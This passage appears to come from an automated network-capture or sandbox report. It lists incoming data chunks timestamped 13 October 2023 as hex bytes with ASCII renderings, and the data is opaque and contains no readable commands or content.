3RlNd}BkgpplG2#gF+}0syZPwWmn!svX*wB-\Ja+Id/"KH6"IKclg
2023-10-13 13:21:15 UTC	7358	IN	Data Raw: b8 3e c2 38 6d 14 c8 a0 80 58 2f 8f de 7b f8 b8 69 59 f9 22 ca e6 44 42 ba 29 95 26 8e 18 0c 1e 0e 13 d5 61 51 37 55 f3 d8 95 34 52 9b 94 37 22 43 ef c6 7e f2 db 9a 9f d3 01 70 99 b0 ef d8 a4 75 5b 18 d9 70 a0 2d 44 90 6f 93 95 4f 61 10 96 73 37 d1 c1 69 5d 6b ba 2f a4 5a 8a ae da 67 80 9e 94 e0 ec de 51 37 eb b4 5d 4c ff 98 0e dd ad 5a ca 62 3c fc d9 0f c1 b4 d8 17 0f c1 6e 7c 4a 4b 40 5e f7 90 90 a5 60 c0 4b 99 72 c1 8c 58 82 8e 81 18 b6 07 8a f7 1b 45 ec 5c e0 34 d1 72 de 0f 87 8c c2 20 7c 6e fb 16 86 66 31 d4 2b 9f ec 94 4d fd e6 57 66 7c 17 06 9f 24 14 60 73 ee 72 40 e7 92 02 bc f8 52 51 df 06 76 33 be ec a0 8e f1 61 1e 82 85 80 c2 fd 54 30 4c ca fa 2b 39 0d 7c d8 52 6b 4a 25 57 a9 65 7d 55 a5 47 57 01 61 81 02 27 93 eb 6b 5d 0e ad bb 56 ee 40 f4 5e Data Ascii: >8mX/{iY"DB)&aQ7U4R7"C~pu[p-DoOas7i]k/ZgQ7]LZb<n\|JK@^`KrXE\4r \|nf1+MWf\|$`sr@RQv3aT0L+9\|RkJ%We}UGWa'k]V@^
2023-10-13 13:21:15 UTC	7374	IN	Data Raw: ee a9 a9 3f 8d 46 ed 9d b9 30 0c 97 4c bf 88 41 ec ca 6d 24 7f d4 22 eb 1a 19 bc 04 16 f3 7e d1 42 e6 54 1c 25 68 59 fa 8f 7e e9 e8 1a 24 2f ef cd 3e 60 1b fc 62 76 00 1c 74 45 a5 cb 05 89 3a cd b7 6d 4a 8f df 4d 87 48 e5 91 64 87 93 9b a9 57 2e 22 47 7d 5a c8 47 81 36 c4 73 d2 de 31 c2 2c 80 95 88 69 fc 0f 2a 3d 82 6e 16 1b a9 a1 13 a6 7e db 44 a9 eb 72 65 e2 80 98 9d 51 c4 16 bb 97 de d5 2a 63 d8 64 23 dc 48 2d 92 07 fe d4 90 5d 20 4c fc 42 c8 68 94 1b 5d a7 31 e8 9c c2 86 a5 da a2 fd da 09 e6 a8 69 08 6b aa 43 00 4d d1 cd 53 ca 65 1d 7a 8c 23 d0 5f 10 a1 8e 7e a6 c7 e3 7e 7f 0a 0e 66 e9 e4 44 63 7c a2 67 9b 29 ac 2a f1 16 f1 00 de 89 9b c8 07 f5 f6 57 4e 3e e9 17 fe 0b 37 5b 05 64 9f 37 bd 76 18 e7 13 2d df 7b c1 9f e2 3c 6d 9f bd 79 58 c9 9e 85 3d 3f Data Ascii: ?F0LAm$"~BT%hY~$/>`bvtE:mJMHdW."G}ZG6s1,i=n~DreQcd#H-] LBh]1ikCMSez#_~~fDc\|g)*WN>7[d7v-{<myX=?
2023-10-13 13:21:15 UTC	7390	IN	Data Raw: 78 72 a4 ba 26 2b ae 2e 20 3c f5 3b 21 4b ad 82 d3 4a 4d 85 64 00 95 9b 5e a1 16 f9 a0 a1 ff 8f 4b e6 a3 e3 05 35 24 95 1d 03 0c 56 df e7 f7 6e 7f a4 85 82 37 78 f1 32 03 38 3e d3 58 da 07 5c 19 8a c4 69 7b 39 1c 80 77 46 99 59 b6 95 8a 26 b4 a1 e2 e3 07 c1 64 d6 74 0a 6c 2d 27 91 34 38 97 c5 3b 4f 54 09 25 06 fd dd 9a 0b 4c cf d6 4d 0e 48 b1 83 b2 7c 21 f0 ab 12 9b f4 9f 1d a2 90 40 94 cb 35 44 90 e9 79 e6 8d 89 56 dd 5a 3a ed db e8 b3 22 c6 3d a6 16 96 8f de 17 76 78 cd 9d 59 bc e9 eb 11 82 c5 7d 5c 0f 05 fc e5 ed 55 7d ac 44 18 29 69 e4 98 24 e4 41 6f f7 3c 00 77 cf ee e3 0c 39 9e fe e4 03 bc fa d6 1d ca 77 97 26 2c 5c 68 f9 22 22 d9 59 4f a2 51 b1 a8 5e f1 5f 1a 8e 1e cb 58 fe c1 7f 43 47 5e 29 11 ca 74 18 4b 95 25 8b a4 c3 c4 92 23 70 ad 5f a4 c1 83 Data Ascii: xr&+. <;!KJMd^K5$Vn7x28>X\i{9wFY&dtl-'48;OT%LMH\|!@5DyVZ:"=vxY}\U}D)i$Ao<w9w&,\h""YOQ^_XCG^)tK%#p_
2023-10-13 13:21:15 UTC	7406	IN	Data Raw: 87 8e ac 17 3a 8d 00 eb bc 4d f3 5b 16 3f 0b b0 c5 ac b6 72 c8 1a bf 81 70 0c 7f d0 4e 4d 23 c0 59 cd c8 47 f1 31 d5 ae 8e c5 5b fd e1 c4 8a 68 8c eb 85 e7 09 89 a6 6f fb 33 6a 24 28 24 bc be cf 03 49 14 8b e6 ea d3 61 82 69 75 17 1c 91 da 74 bf ca d8 c7 96 03 f5 8d 10 14 c6 76 ca c4 fd f7 96 a4 d3 0e 0e b2 1c 4d 9e d3 f6 34 4d 84 71 d0 15 dd 68 ae c6 a1 78 7d b7 0f b0 f4 c8 97 84 64 43 64 a4 6c 70 e3 33 88 87 f9 7b c7 93 ff d2 1b 64 19 67 6c 8f c1 d2 fa f6 4d c1 92 d6 e0 c1 db e4 e7 12 b9 d7 f5 4a 8c 65 9d d1 97 34 91 a3 00 a0 1a f2 5b 79 72 38 23 a9 a0 fa 5c 9a a2 d8 6e 77 c3 c5 7a 6d f6 72 ae 6e ae 2b 7f 33 3e 03 e8 ec 1d 6d d7 a1 9a ed d6 1e 8e 29 e4 8c 29 23 69 f8 bb 70 97 48 47 7d fb 3f ee 44 95 bb c7 1a 7e 77 71 d0 5c 9b c3 0b 4e c2 96 6d 8b 8f 2d Data Ascii: :M[?rpNM#YG1[ho3j$($IaiutvM4Mqhx}dCdlp3{dglMJe4[yr8#\nwzmrn+3>m))#ipHG}?D~wq\Nm-
2023-10-13 13:21:15 UTC	7422	IN	Data Raw: 91 f7 3d 91 40 71 86 80 46 eb 37 10 be 15 98 1a 3d e8 03 39 7e db f2 1d ce 9b ca 26 85 c4 b5 12 15 aa 2f ad 9b 03 14 da 55 c8 04 94 1d 3a bf 89 0f 22 e2 61 a9 c0 f6 a9 12 c2 1f 65 e1 78 ea e9 38 d2 d8 2a 7c 91 f8 7d aa 43 12 fd 38 66 4a f7 eb f8 83 d1 2c 4a 65 ce b5 45 f8 77 0d 34 f6 07 87 54 01 fa 7e 07 c6 fc 28 02 c0 be ab 70 4e 71 bc 57 53 78 7a ee 19 53 3c c1 cf 80 65 11 8c 00 95 55 f1 40 77 4e 8f e9 b1 a7 2d c7 02 66 3b 73 f1 43 7a fb 40 37 98 01 01 e2 51 52 88 89 3f 13 25 ae a1 05 77 d3 39 89 a0 b9 5e ef be 5d c5 33 cc 9b ce d0 7e bd 4e 83 66 d5 d4 a1 34 23 a1 e5 43 7a 9c 67 a7 39 d8 cc 2e 4f df 9b 17 0f 47 28 82 39 a5 cf 85 84 af 1c 2f 49 e8 1a 08 0d a2 8a 20 7f f0 a6 82 23 a9 e2 06 e7 d2 5b 8c 1c 81 e0 55 74 f9 f7 e7 7c 5a c8 b9 fd 8d 2b ae 7a 33 Data Ascii: =@qF7=9~&/U:"aex8*\|}C8fJ,JeEw4T~(pNqWSxzS<eU@wN-f;sCz@7QR?%w9^]3~Nf4#Czg9.OG(9/I #[Ut\|Z+z3
2023-10-13 13:21:15 UTC	7438	IN	Data Raw: 55 5b c5 56 19 a3 25 aa 5b db ee 13 4c ac ae 85 ea 40 94 5b 03 5b 8c fb 67 1b 29 29 d6 fd e9 ca c7 46 ec 56 f5 b5 18 14 83 d6 19 86 ea da 57 a5 13 fe 65 c1 ee c1 85 1a eb f9 80 fd 8d 49 3d df 6f 81 37 c6 e6 5b b8 4f d8 b3 79 70 e2 33 5e 51 9e a2 73 6f 62 4c 25 42 49 df 30 5d e6 0a a2 1c 34 42 10 8d 1a a8 99 92 6e 16 de 0c 92 58 66 a8 28 f8 82 e6 72 b2 db a9 f2 3b 50 63 13 d5 16 9f ff aa 6b 54 d9 d0 0f ad 4f e6 38 6f 02 64 07 02 9a 5c 35 e7 93 16 8d 94 8b c6 f8 ab 65 bf 14 fc c5 79 12 f2 9f ea 0e ea 0b 81 61 26 6d 3a f2 71 2f bb 4f 16 e7 87 af 7c 9a bf 18 e0 6a 67 29 c7 fd bd 50 d5 d1 8e c5 96 8e c5 ba 03 c5 6c 86 e0 4c d3 3e 6a 0a 52 ee 0f 51 0a 21 38 0a 91 86 c4 a9 9b 1e ec e8 ed 2f 18 d9 51 f2 b8 b2 5b 3a 63 a7 db a6 97 2f 47 79 e3 12 64 19 eb e9 93 0e Data Ascii: U[V%[L@[[g))FVWeI=o7[Oyp3^QsobL%BI0]4BnXf(r;PckTO8od\5eya&m:q/O\|jg)PlL>jRQ!8/Q[:c/Gyd
2023-10-13 13:21:15 UTC	7454	IN	Data Raw: 30 93 12 25 ec e9 07 ae ba 86 21 ae 4a bc 4d 16 30 fc fc 69 65 33 e8 21 94 da 24 82 90 75 fc b5 07 2a 58 d5 0f 14 eb d2 e4 f3 97 75 7d cb d1 c9 80 e8 be f5 c9 4d 38 b4 31 d8 ce b5 d5 ff 28 ad e4 08 63 37 da d7 bb 93 8a 49 ae 63 56 39 87 2a 34 22 bb 16 52 b8 18 0a 7d 82 0d fc 87 00 68 5b 1e 49 b1 8f f0 eb 28 b9 51 a2 12 30 86 a0 c6 47 16 f9 e4 80 d3 20 46 ad c2 b3 f8 ed 10 6c 62 4e 5d 97 9b 85 64 8a fb 09 b5 f8 b0 8d b5 ef c5 64 ab cc 13 52 3f 5c c2 54 c7 38 a8 21 c7 ca 38 4f bf 93 bf 8c 72 89 ab 45 e6 ca a6 26 89 bc f2 de ab a8 da b2 0c 65 77 f2 1f e4 cb 25 4c b2 d3 bf 32 e1 71 64 ce 6a de 26 f8 d4 ed 66 cb e0 07 e8 41 81 8b 99 1e a7 4d 3c b9 1b 55 d9 01 db 49 93 aa 9e e8 11 46 c9 a0 3b 49 d6 fc cb ab 9e 3d 96 c1 fb 1a c7 33 df 67 b9 a9 32 33 1b 0e 26 58 Data Ascii: 0%!JM0ie3!$uXu}M81(c7IcV94"R}h[I(Q0G FlbN]ddR?\T8!8OrE&ew%L2qdj&fAM<UIF;I=3g23&X
2023-10-13 13:21:15 UTC	7470	IN	Data Raw: 78 96 ad 9e 1d 27 b5 c1 fd 2e 2c 58 fe 2f ee 16 48 63 ac 9b b4 18 fe 5c b5 bc f7 87 61 46 06 13 1d 30 23 c3 9c 03 d9 e5 fe 5a a4 2d 75 15 40 ef 64 cf 43 25 9b af 03 19 5f 6f a1 b5 64 bf 85 b5 ae 4a 31 c9 7b 86 75 d3 77 53 76 39 fa c6 bc 67 e5 a7 c9 80 b9 be d8 24 0b 58 7b 25 0b b1 ea 47 69 b3 ad ae a6 74 88 ce 74 2c dc 2e 6f 0c 92 7e 48 f8 2d 4d b6 c6 c8 5f eb 73 51 ae 61 fb d6 c0 4a 39 b8 58 b4 5a 90 35 4a 11 ca 19 7d 84 d5 aa 9a a3 77 d0 c9 14 d6 bc 0d 0b 5d 0d 35 9a 3e e0 ff 17 3f 01 bc 66 04 47 28 d4 05 9e b6 95 2d d4 98 72 c0 e2 8b 71 9c a2 0e d6 44 1e 7d 7a 46 f5 ce 60 1e cd 43 80 02 1c e0 ef f5 ac ed 27 b8 91 99 91 17 6b fb 9e 13 e8 6e 72 88 a0 65 cb 21 36 a6 9b 81 6f 41 a5 52 5b 7c 2b 83 d5 c1 08 c3 23 7a 11 03 c0 62 5f 8c 09 d4 b2 85 74 d8 97 ae Data Ascii: x'.,X/Hc\aF0#Z-u@dC%_odJ1{uwSv9g$X{%Gitt,.o~H-M_sQaJ9XZ5J}w]5>?fG(-rqD}zF`C'knre!6oAR[\|+#zb_t
2023-10-13 13:21:15 UTC	7486	IN	Data Raw: 30 d5 8a d6 08 1a 13 43 93 08 71 5e c9 03 f5 f7 de 49 ce b6 59 14 49 e8 d6 aa 45 b9 a9 a1 72 b3 6a 85 95 d6 35 68 1e 56 24 f0 52 cb 72 54 c6 c6 cf 42 07 2c 3f 31 4d 20 54 59 f9 ee 5c b5 8e 7d b1 2c 8c 20 5c b9 86 64 bc 54 d7 f7 45 40 29 f4 9b 47 6c 64 13 4a f9 78 d9 01 b4 0e 27 0b 7b b0 e4 c0 0c ee b0 59 f9 59 6e 7b ee 0c 4a 5a 7b b1 17 68 57 35 3c 93 64 49 38 0c f7 29 c7 d8 c0 fe f0 8e c0 99 d9 8f 7b 80 0a 69 32 65 ed 71 d1 8a 31 b3 e6 80 bc 6c 5d 46 e2 a6 8a e8 f8 2f 42 3c b0 04 f8 3c 19 2a 8a 02 4d 3f 17 92 a1 97 e4 c2 0f af 40 0b c7 fd 3b ec d8 e7 33 56 16 41 a6 c3 4a 0e 79 ab 77 fc d6 81 60 83 a1 b8 05 c5 ac 98 ac 08 a2 4f 8e e1 64 86 a0 7f 0a 1e 90 2c a1 a8 b2 e3 48 1f 7a 4b 8d 7b dc 5e 1e a0 aa c7 1a d2 8a 82 1a cc da 05 b5 87 96 22 a5 60 81 d2 f9 Data Ascii: 0Cq^IYIErj5hV$RrTB,?1M TY\}, \dTE@)GldJx'{YYn{JZ{hW5<dI8){i2eq1l]F/B<<*M?@;3VAJyw`Od,HzK{^"`
2023-10-13 13:21:15 UTC	7502	IN	Data Raw: 30 6e 85 55 d7 dd 90 36 be 58 bc e7 7c eb 9f 9b 43 37 ee c1 27 5b 44 43 bc c1 18 1c 2a 81 16 32 65 73 ee 56 83 a6 ea d3 b9 d0 bb 9f f9 97 45 a8 5c 78 e4 7f 96 94 b6 44 2f e2 79 2f 2a 25 fe 3b ca b1 54 1b b1 43 0b 9a e3 ba b1 4e 28 6f 22 cf 4c 9b 57 17 62 53 cb e6 a5 d5 4a 4b dc a0 97 4a bd 0f d6 45 62 74 22 fa 78 86 df 1b 0f c5 78 28 26 55 1c 0b 93 05 e4 3c 68 22 16 71 1b 8c 10 34 1b 25 2f d2 d3 b3 c2 01 d4 e2 b5 bf 4e 44 1c d4 c9 89 9b 3b b7 db f4 59 81 df 15 96 8e e4 82 8e f5 2a 36 2e c9 d9 ab e8 81 85 56 08 6c e5 47 96 c5 67 0d 39 cf 03 28 70 42 58 e3 fc 34 e6 26 0f ed 0b 8b 06 00 67 b5 3f 97 b1 1e 52 30 95 fe e1 27 1b b3 ff b2 48 05 0d 87 bf 13 0f dc c9 d1 a3 b6 64 71 3c 01 e3 9b 07 3d 26 8c 96 1e b4 25 fc b4 03 2d 14 22 fd ed 2a dd 6d ee e6 1b 9f ff Data Ascii: 0nU6X\|C7'[DC2esVE\xD/y/%;TCN(o"LWbSJKJEbt"xx(&U<h"q4%/ND;Y6.VlGg9(pBX4&g?R0'Hdq<=&%-"m
2023-10-13 13:21:15 UTC	7518	IN	Data Raw: 20 51 32 1a 21 0c 1f 03 b0 0e 36 08 1a 91 65 de cb 23 2b aa 66 28 62 e7 56 d8 76 16 04 4b 84 bf d4 b3 0e 26 6a fd 20 c8 c4 b1 c4 34 6e 0f 51 b0 9d 42 64 09 5c a7 0a a2 2e af 7c b8 ee 24 d7 66 d3 cf 78 f3 c6 92 a6 4c 2f 4c 82 cb 93 d8 82 c0 92 41 61 fb 4c f5 67 89 84 bf 5f 00 ad 7b 15 e4 21 0a 3d 25 d3 a6 0b 0b ae 55 77 37 b7 fd 66 9b 3d 09 95 6b 4a 48 b3 0c c4 9d e3 9a d1 17 f6 e8 36 3e 1e 1b 42 a1 8b 8d 8e 10 84 ef 5c 8c 59 6a 4e 9e a6 ca 3a 12 2d 1d 72 af b4 a2 a2 5f bb 78 d7 86 e2 53 38 5a e4 d3 68 ff bd 3b 81 b3 fa df 8c df 7d 62 25 16 de 0d 66 90 a1 e0 86 fd de 1d cb b5 bf 4a a9 4b 54 8a 66 a2 60 67 61 3e 40 ea a4 46 b3 a1 01 97 d0 97 eb ce 79 01 f6 16 8d 5e 87 5b 9f 2d 86 8e 66 f8 ca 22 9d 4b 9b 51 f9 98 46 17 af 63 34 6b 85 f5 f7 dd 77 4d 3e 5e d1 Data Ascii: Q2!6e#+f(bVvK&j 4nQBd\.\|$fxL/LAaLg_{!=%Uw7f=kJH6>B\YjN:-r_xS8Zh;}b%fJKTf`ga>@Fy^[-f"KQFc4kwM>^
2023-10-13 13:21:15 UTC	7534	IN	Data Raw: 61 1e 08 34 16 d3 86 1a e7 c5 93 2b 49 24 90 a0 22 a9 c3 49 39 d4 c4 3a fe 7c c7 76 fc 29 81 ec 17 41 e1 f5 76 08 38 0f cb 63 fd 14 80 4e f2 89 f3 d9 9a 62 a8 71 0b 3a 1e 2d 4a ee ab 12 3f 07 68 9f 69 44 bf d6 1d eb 24 0e 5e a9 44 3a f1 72 8c 7d ce 1a 67 f3 2a 9c 43 8a 50 56 91 19 5d d2 05 9f 55 66 58 c5 d0 1b 16 39 84 e1 76 65 81 ca 1b 69 d1 46 91 b4 ae d0 a7 95 5f 23 a6 72 de f4 a0 c5 f0 98 3e bf 70 26 36 4f 91 73 ef 64 99 17 99 75 f4 2e 4c 26 5d 2e c2 5b f8 1c 30 df 5d 07 da cd 6d 6a 00 cb 87 28 d6 84 29 dc ba 03 f1 c7 14 9f c6 94 64 67 b0 e8 96 6b d7 e6 a1 cb 13 c1 f5 5c 50 80 78 76 93 ea 5c 87 ce 06 f5 99 d4 ea 88 b2 08 4f db 66 7e e6 7d 1e 13 88 eb 3f 4a f9 b4 16 c1 4a e0 6a bc 1d 7a 9f 84 e3 15 75 92 13 33 da 8d 1f 98 7a c3 23 36 8b a9 7e f9 c4 80 Data Ascii: a4+I$"I9:\|v)Av8cNbq:-J?hiD$^D:r}g*CPV]UfX9veiF_#r>p&6Osdu.L&].[0]mj()dgk\Pxv\Of~}?JJjzu3z#6~
2023-10-13 13:21:15 UTC	7550	IN	Data Raw: 52 e5 93 d5 3b 85 68 eb 3c a2 4c fd fe 61 c8 de ec 65 f7 bf 44 21 db 67 23 e2 7d 4d 91 d0 3b 80 ba 48 fa 71 73 64 53 13 62 07 90 7f a5 7d da 8b 99 b0 e7 7b e9 95 67 c1 a9 0d e9 73 84 a9 09 21 32 db 59 9a 74 ed 1c 71 ef 57 bb c4 59 79 e5 fa 4a da a5 6f 32 49 c5 d1 ef f4 9b 71 17 5a 5c 24 e3 fc f1 b0 74 53 16 15 05 a1 4f 59 b2 e5 bb 43 54 27 83 19 e7 7f 40 f5 fe a6 96 33 a8 9b 11 f0 f9 dc c5 1e 0b 93 33 1e 52 9a 13 ed 2c ac f2 fe b2 ce 8d 2d 96 85 95 e6 de 0e f3 ef 49 38 29 95 23 04 9c 22 85 a2 2c 63 d0 d2 a2 49 aa dd f7 ec 3b 25 b6 41 71 85 88 d7 28 cf 3e 52 68 43 a9 24 9a e0 07 5d f5 da ef fa fb 4b 93 07 f7 13 eb 88 5c 3c 59 6a 98 08 e1 a9 84 84 5f fd 1e a0 17 4d b1 6e a8 01 ea 88 22 76 74 8c 27 50 54 0b e4 c0 a1 19 45 fc 6a e6 c5 53 b1 83 5b 3a f7 d7 78 Data Ascii: R;h<LaeD!g#}M;HqsdSb}{gs!2YtqWYyJo2IqZ\$tSOYCT'@33R,-I8)#",cI;%Aq(>RhC$]K\<Yj_Mn"vt'PTEjS[:x
2023-10-13 13:21:15 UTC	7566	IN	Data Raw: 3e ea cc 08 15 8a bb 4b 70 4d e1 82 b4 e0 8e 64 32 27 f5 f7 bf ca 43 8f 5e 3f 3b c7 1d 3f 63 50 09 71 65 ce c7 5b f0 ca 2a 3b b3 83 1c dc 7b d1 c9 a4 6f 09 9f ac 01 e1 15 f6 f7 e6 e8 92 6c f5 6b 83 60 90 59 14 84 8f fb 3d 95 36 78 4b 29 83 f7 5a 9c 1c 9c f1 cd ff c0 ad b3 96 86 a1 b5 23 9b 11 8c 57 fd de 80 64 92 71 0e f0 a3 21 7a 71 a6 d7 87 61 07 e1 09 84 c8 d1 8d f8 20 0a 83 a4 77 ec 36 7a 36 40 d6 01 33 f6 21 91 e8 84 62 17 78 cb 28 36 9b 4c 66 af c4 58 3e a0 85 9f 31 b7 66 db b9 bf 94 db 08 c0 bb d9 30 23 c8 8e ed b7 d5 05 38 b5 21 3b 05 5b c2 47 bf 03 20 60 35 87 c3 d6 53 74 d8 64 8c d0 e3 f7 7c 80 0e da 6d 48 31 16 fd 70 09 bf 46 33 2c 0e fc f0 2a d8 dc 14 f3 bc 46 19 16 37 5c b1 d1 a6 75 d5 7b eb 39 cd 4e 37 8e 02 9f 08 bf 99 97 79 c5 75 b2 38 2e Data Ascii: >KpMd2'C^?;?cPqe[;{olk`Y=6xK)Z#Wdq!zqa w6z6@3!bx(6LfX>1f0#8!;[G `5Std\|mH1pF3,F7\u{9N7yu8.
2023-10-13 13:21:15 UTC	7582	IN	Data Raw: 62 a9 e9 4c 79 e2 44 d6 46 9f 88 9b ce b2 21 83 b8 b3 a1 be 3c 1f 13 c2 f2 7c ce 79 b9 f4 2a 56 2f 43 38 59 4e d4 95 53 45 c6 2e 5e 06 fd d0 c3 16 a1 94 0a 5c 2a bf 6e b8 bf a6 53 d9 5d f4 d7 91 82 fc a6 c4 2c 05 a8 49 ec f5 ab fb e7 92 6b 13 30 64 c9 44 00 c4 77 c1 62 29 56 56 b9 dc a2 e6 c4 37 48 67 65 c6 0f 6d 66 7f 1e 6a 68 f9 8a 5d de f3 10 f0 05 e4 da 0e bd ce 58 96 76 e4 8e 35 67 7b 17 79 d6 b8 7e c4 77 98 72 a3 aa d0 2b fb 8c e0 4b 33 fe a4 b0 a7 f1 ae f8 76 4f d4 36 cd be 6a 66 7e 2e 57 86 ca aa 3d 5b bb 8e ed 0e f5 7d 65 a8 1e 48 df 25 dd 5d 03 c6 49 e1 c7 4d 6e 34 98 21 9f e8 c2 6b b8 e8 cb 8f 87 f2 db 82 7e 03 64 5d 1d 7a 14 d0 f9 c1 e4 d8 5d 81 e0 7a da 9b dc 39 fd bd 53 50 c5 50 b0 86 be 19 b1 a7 72 c5 26 42 70 0a 45 7a ec 67 8b 35 9e 0b 28 Data Ascii: bLyDF!<\|yV/C8YNSE.^\nS],Ik0dDwb)VV7Hgemfjh]Xv5g{y~wr+K3vO6jf~.W=[}eH%]IMn4!k~d]z]z9SPPr&BpEzg5(
2023-10-13 13:21:15 UTC	7598	IN	Data Raw: 77 be f4 2e 83 62 a5 9f 0b e6 e2 1e 42 4f 4c 75 d4 bb de 9e 5e 14 73 33 e7 17 0b aa ea f0 c3 97 a0 8f 33 01 86 57 ae e5 72 55 e9 e9 32 20 5b a4 d3 fb 85 fa b8 9e 9a d4 98 b8 9a 18 09 58 dc 6c c1 74 84 e2 31 db 0c c3 3b e6 af cd f7 e2 e8 fd 68 a4 92 9d a2 c3 ad e4 b6 62 eb af 26 e8 65 d2 22 60 7f 6f 11 52 dd 21 9a 1d fb 56 c6 60 77 27 6b f3 14 14 e1 d2 b9 ab e4 a0 97 a1 ad 35 1b 58 ed f8 b1 f1 eb 07 8b 1a e5 32 af 37 2c 54 cb 6b f3 13 23 a0 86 0a ad 4e ae db b7 93 a3 af df f8 34 87 a5 80 5b a3 c5 c6 14 d8 35 3a 3c cc 47 35 6b 10 8d 5c 3a dd 5e 22 fb bc e8 0b 4a d7 0c ad 69 ce 31 73 af 74 41 31 08 d6 c9 50 6c be 36 45 3a c7 20 6c 4c 85 79 09 80 96 74 2d 6f b1 77 b0 0d cd 42 39 6f dd ae 07 9e 21 a8 0a 64 01 34 71 4e ba 00 d0 a5 1a 10 36 66 76 9b 15 17 29 c2 Data Ascii: w.bBOLu^s33WrU2 [Xlt1;hb&e"`oR!V`w'k5X27,Tk#N4[5:<G5k\:^"Ji1stA1Pl6E: lLyt-owB9o!d4qN6fv)
2023-10-13 13:21:15 UTC	7614	IN	Data Raw: 26 8f ad c4 30 bd f8 72 c9 7c 08 e3 d0 1a de 58 45 90 08 48 16 32 99 7b 91 38 bb 04 f7 52 83 1b 1c 79 f5 0f 48 df b5 07 e2 4b 0d 26 ed a7 fd 38 40 85 80 fd a9 eb 10 f2 bc ce 16 0d cd 74 12 20 52 02 f7 6a 3e b6 17 8b 94 a2 37 2b 6a e6 8f 64 ec 65 94 82 19 54 94 cd 01 e5 b8 35 78 d8 ad f4 5f a3 aa 1c fb a9 f6 40 e1 1f 5c 79 39 51 53 a2 90 fb b4 b6 a3 39 6b 87 37 5c c2 cc e5 fb 99 02 f2 73 05 13 d2 ad 73 09 a5 3a 87 8a 9b 77 df fe 31 08 2c a7 90 f4 16 e2 80 a2 73 c9 ce b6 f1 4d cf 42 c7 0a 9f d2 66 b1 bc 92 1b c3 c9 d3 18 42 fd a5 41 aa 7f e7 be 98 17 93 54 bb 51 ab c8 aa 40 93 b1 c4 e2 9f 3a 32 6d 0e 1d d8 b9 4b 9e 3a 3e a1 61 7b cd 5c 27 e6 c8 40 4f fa a2 55 c8 34 68 f5 74 d7 ca 84 8b 42 1a 8f 4d 9a a0 b4 af 8c c5 3d c8 ab c8 ae a9 09 e8 9e ca 2e 50 db e2 Data Ascii: &0r\|XEH2{8RyHK&8@t Rj>7+jdeT5x_@\y9QS9k7\ss:w1,sMBfBATQ@:2mK:>a{\'@OU4htBM=.P
2023-10-13 13:21:15 UTC	7630	IN	Data Raw: 3a 87 dd dc 94 fc 93 42 e9 86 5b 76 ef bb fd fb ad 34 3f 94 21 68 52 dd dc c2 a4 6c 48 d4 40 54 05 be 04 24 23 43 d9 9c b7 1e dd ce 52 a7 a0 3e ab de 90 7c c7 f5 fd 82 ce 3f 76 7b c9 02 07 9a 6e 84 bd 1a 7c 24 f2 6f 16 63 60 4f bf bd 03 d3 17 32 7b 66 96 3f 9f 64 5c 19 2d b0 7d ba ce 79 fd 43 2a d1 57 a8 90 07 0f e0 96 cf 76 5b 27 c2 c3 ba a3 b8 83 0b 50 24 e9 4f 67 46 36 cd 04 23 9f f4 77 29 1e 10 96 2d b7 28 31 44 2d d0 ce 6e c4 9d 36 bb 9e 57 d0 e4 df 66 7d 1a a3 29 e0 6d 4a 0b 99 6f 78 84 fc a8 83 9d 94 90 cc 7c d5 8a 7d 20 fc 0e 02 dd b1 4e a3 11 90 59 81 91 e5 60 87 58 4b c1 01 11 9d 3d e8 17 3f c6 a1 70 a2 21 f1 08 02 51 89 ad 13 60 2b 40 ae e5 0b fc 56 35 17 c2 85 95 ba 44 1f e3 9a d8 67 8e 36 22 4b b1 e1 bd b5 be 0a 61 a4 c4 5a de 35 88 b9 e9 7c Data Ascii: :B[v4?!hRlH@T$#CR>\|?v{n\|$oc`O2{f?d\-}yC*Wv['P$OgF6#w)-(1D-n6Wf})mJox\|} NY`XK=?p!Q`+@V5Dg6"KaZ5\|
2023-10-13 13:21:15 UTC	7646	IN	Data Raw: 31 5f 0b b8 b0 fa 75 b5 91 c8 5f 09 b0 ef 7a ea 54 d3 a0 64 71 1d b7 b2 06 92 68 2a c7 92 30 f8 cd 63 2a 1f 22 99 7e f2 d6 40 73 d2 c2 35 8a 77 5d 80 74 52 1b a4 d3 75 3d bf de cc 30 52 4d a6 cc 16 bf 35 58 61 45 bf 1a 1a 50 a6 dc 96 c5 34 8d 56 76 6d dc 7e 73 97 b4 0f 86 86 40 89 98 30 5e b2 47 fe 29 50 ce ab cf 3f a0 4e e3 72 32 39 bd 54 fb fe 01 5d 04 e8 27 d2 b4 a4 80 36 38 dc f6 4c 7a 46 11 4f c5 ff f0 ad 68 0a bb 48 37 84 13 de 12 c4 fc d9 57 ea 01 c3 e1 fb 73 16 cd ef db 83 f5 c4 35 33 f8 2f fa 2a d2 4f 35 0b 6c 44 d8 ff 1e bf f3 96 c6 2c 3e 62 cc 83 e8 66 ec 56 7a 49 1a b2 57 b8 b8 3c 09 93 43 31 41 a4 93 f5 ed 3e d5 9b b0 ed cd 93 ee 71 37 2f df df b2 94 19 8f 72 0e 05 53 fc 6d 97 e5 06 26 08 42 77 66 59 06 0e 5f 42 90 a5 8d d9 3d bb 0b 9e e3 cd Data Ascii: 1_u_zTdqh0c"~@s5w]tRu=0RM5XaEP4Vvm~s@0^G)P?Nr29T]'68LzFOhH7Ws53/*O5lD,>bfVzIW<C1A>q7/rSm&BwfY_B=
2023-10-13 13:21:15 UTC	7662	IN	Data Raw: 46 6b e2 cb 31 7b cd 2e f3 21 3f 16 8e 29 75 4a c0 97 06 45 d6 14 42 fb 93 db 6f ef 91 57 1d 3a 41 ba b9 97 35 71 76 c2 cb f7 e9 9f a8 30 a3 52 4c da 8b c7 1f 4d b0 00 c5 b4 b3 58 a7 2e 55 9c 67 98 f8 30 45 81 2a a3 bf b7 f1 a8 a1 93 39 cd d1 7a cc a4 e5 79 17 fb a5 b0 11 a8 d2 86 7e ec cf d1 e6 f2 1f d9 7b 45 22 3e c7 31 bf 91 12 c7 f5 dc f0 ab bc a9 d6 31 fe 7f 3d 15 28 02 af 0d bc 95 8c cf a6 79 11 5d 02 c9 e5 92 8c a3 b8 cf df b4 88 0e 3d e2 ca f9 5b 9f c9 28 70 bd 8e 66 9c 51 7f 3c 85 6b c2 0a 75 34 ac 77 46 5a 55 d2 d5 8c da 34 e3 21 c9 2e 42 56 7e b5 ce 34 18 c9 99 1c c4 b1 49 7c 05 dd ec e5 c6 23 f1 e2 58 e6 fc 2d 32 14 92 a0 a9 25 a4 55 ab 7f c4 5e 25 c0 c3 94 01 5f 09 e6 26 68 e8 32 1d 7d c5 f3 0b f0 db 6d a3 f0 fc 01 e6 eb 